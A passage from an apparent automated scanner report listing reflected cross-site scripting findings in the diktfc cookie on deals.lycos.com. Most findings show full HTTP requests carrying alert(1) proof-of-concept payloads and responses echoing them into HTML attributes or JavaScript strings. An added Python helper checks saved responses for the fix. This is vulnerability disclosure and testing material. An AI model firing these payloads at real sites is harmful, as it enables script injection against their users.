Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/cell-phones-174 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2b2e8"%3balert(1)//ec00ddd9290; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
pt type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/cell-phones-174",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2b2e8";alert(1)//ec00ddd9290"
});
</script>
...[SNIP]...

1.262. http://deals.lycos.com/deals/category/cell-phones-174 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/cell-phones-174

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfd7d"><script>alert(1)</script>0b7224d164c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/cell-phones-174 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abfd7d"><script>alert(1)</script>0b7224d164c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/cell-phones-174&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abfd7d"><script>alert(1)</script>0b7224d164c&amp;cj=1" alt="tracker" />
...[SNIP]...

1.263. http://deals.lycos.com/deals/category/clothing-and-accessories-202 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/clothing-and-accessories-202

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52676"><script>alert(1)</script>35e6603099d was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/clothing-and-accessories-202 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A52676"><script>alert(1)</script>35e6603099d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/clothing-and-accessories-202&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A52676"><script>alert(1)</script>35e6603099d&amp;cj=1" alt="tracker" />
...[SNIP]...

1.264. http://deals.lycos.com/deals/category/clothing-and-accessories-202 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/clothing-and-accessories-202

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3b23"%3balert(1)//cf9f07eb831 was submitted in the diktfc cookie. This input was echoed as b3b23";alert(1)//cf9f07eb831 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/clothing-and-accessories-202 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab3b23"%3balert(1)//cf9f07eb831; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:58 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/clothing-and-accessories-202",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab3b23";alert(1)//cf9f07eb831"
});
</script>
...[SNIP]...

1.265. http://deals.lycos.com/deals/category/computer-39 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/computer-39

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcb82"><script>alert(1)</script>9d654d77a5c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/computer-39 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abcb82"><script>alert(1)</script>9d654d77a5c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:58 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/computer-39&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abcb82"><script>alert(1)</script>9d654d77a5c&amp;cj=1" alt="tracker" />
...[SNIP]...

1.266. http://deals.lycos.com/deals/category/computer-39 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/computer-39

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 409c8"%3balert(1)//11fafd7bd7d was submitted in the diktfc cookie. This input was echoed as 409c8";alert(1)//11fafd7bd7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/computer-39 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A409c8"%3balert(1)//11fafd7bd7d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:00 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/computer-39",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A409c8";alert(1)//11fafd7bd7d"
});
</script>
...[SNIP]...

1.267. http://deals.lycos.com/deals/category/dating-services-445 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/dating-services-445

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c53d"><script>alert(1)</script>985194847a was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/dating-services-445 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5c53d"><script>alert(1)</script>985194847a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:47 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/dating-services-445&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5c53d"><script>alert(1)</script>985194847a&amp;cj=1" alt="tracker" />
...[SNIP]...

1.268. http://deals.lycos.com/deals/category/dating-services-445 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/dating-services-445

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4441"%3balert(1)//cc97a4d4e35 was submitted in the diktfc cookie. This input was echoed as b4441";alert(1)//cc97a4d4e35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/dating-services-445 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab4441"%3balert(1)//cc97a4d4e35; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:48 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:49 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17051

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ype="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/dating-services-445",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab4441";alert(1)//cc97a4d4e35"
});
</script>
...[SNIP]...
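Each "Issue detail" paragraph states which sink the canary landed in (a double-quoted JavaScript string, or a double-quoted HTML attribute) and whether it came back unmodified. The following Python is an added example, not part of the report or of the scanner that produced it: it reproduces that classification offline over response bodies constructed from the snippets for issues 1.267 and 1.268, so the findings can be re-checked from saved responses once a fix has been deployed, without re-scanning the site. The surrounding markup, the function names and the quote-counting heuristic are mine.

```python
import html
import json
import re
from urllib.parse import unquote

# Canaries and path copied from issues 1.267 and 1.268; the markup around
# them is constructed from the response snippets in the report.
DIKTFC_PREFIX = "013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A"
ATTR_PAYLOAD = unquote('5c53d"><script>alert(1)</script>985194847a')
JS_PAYLOAD = unquote('b4441"%3balert(1)//cc97a4d4e35')
PATH = "deals.lycos.com/deals/category/dating-services-445"

IMG_RESPONSE = (
    "<html><head><title>Lycos Deals</title></head><body>\n"
    '<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;'
    f'c4={PATH}&amp;c5=&amp;c6=&amp;c15={DIKTFC_PREFIX}{ATTR_PAYLOAD}&amp;cj=1" alt="tracker" />\n'
    "</body></html>"
)
SCRIPT_RESPONSE = (
    "<html><head><title>Lycos Deals</title>\n"
    '<script type="text/javascript">\nCOMSCORE.beacon({\nc1:2,\nc2:6036445,\nc3:"",\n'
    f'c4:"{PATH}",\nc5:"",\nc6:"",\nc15:"{DIKTFC_PREFIX}{JS_PAYLOAD}"\n}});\n</script>\n'
    "</head><body></body></html>"
)
# What a fixed page would return for the attribute sink (constructed).
ENCODED_RESPONSE = IMG_RESPONSE.replace(ATTR_PAYLOAD, html.escape(ATTR_PAYLOAD, quote=True))


def reflection_contexts(body: str, payload: str) -> list:
    """Return the sink context of every verbatim reflection of `payload`:
    'js-string' / 'js-code' inside a <script> block, 'html-attribute' /
    'html-tag' inside a tag, otherwise 'html-text'.  The quote count is a
    heuristic: escaped quotes and multi-line string literals are not handled."""
    contexts = []
    lower = body.lower()
    for m in re.finditer(re.escape(payload), body):
        before = body[: m.start()]
        if lower.rfind("<script", 0, m.start()) > lower.rfind("</script", 0, m.start()):
            # Inside a script block: an odd number of double quotes on the
            # current line means the canary sits inside a "..." literal.
            line = before.rsplit("\n", 1)[-1]
            contexts.append("js-string" if line.count('"') % 2 else "js-code")
        elif before.rfind("<") > before.rfind(">"):
            # Inside an open tag: odd quote count means inside an attribute value.
            tag = before[before.rfind("<"):]
            contexts.append("html-attribute" if tag.count('"') % 2 else "html-tag")
        else:
            contexts.append("html-text")
    return contexts


def reflected_encoded(body: str, payload: str) -> bool:
    """True when the canary appears only in a neutralised form: HTML-escaped
    for an attribute/text sink, or backslash-escaped for a JS string sink."""
    if payload in body:
        return False
    candidates = (html.escape(payload, quote=True), json.dumps(payload)[1:-1])
    return any(c in body for c in candidates)


if __name__ == "__main__":
    for name, body, payload in (("1.267", IMG_RESPONSE, ATTR_PAYLOAD),
                                ("1.268", SCRIPT_RESPONSE, JS_PAYLOAD),
                                ("fixed", ENCODED_RESPONSE, ATTR_PAYLOAD)):
        print(name, reflection_contexts(body, payload),
              "encoded" if reflected_encoded(body, payload) else "")
```

Run against stored responses from the fixed build, every finding in this series should come back with an empty context list and `reflected_encoded` true; a non-empty list means the canary still lands in a live sink and the fix needs another look in that context.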

1.269. http://deals.lycos.com/deals/category/digital-cameras-168 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/digital-cameras-168

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 530f2"%3balert(1)//66373ee2c96 was submitted in the diktfc cookie. This input was echoed as 530f2";alert(1)//66373ee2c96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/digital-cameras-168 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A530f2"%3balert(1)//66373ee2c96; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:55 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ype="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/digital-cameras-168",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A530f2";alert(1)//66373ee2c96"
});
</script>
...[SNIP]...

1.270. http://deals.lycos.com/deals/category/digital-cameras-168 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/digital-cameras-168

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ebbb"><script>alert(1)</script>5ed481c16d2 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/digital-cameras-168 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8ebbb"><script>alert(1)</script>5ed481c16d2; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:53 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/digital-cameras-168&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8ebbb"><script>alert(1)</script>5ed481c16d2&amp;cj=1" alt="tracker" />
...[SNIP]...

1.271. http://deals.lycos.com/deals/category/electronics-142 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/electronics-142

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8df10"><script>alert(1)</script>decb6417e3f was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/electronics-142 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
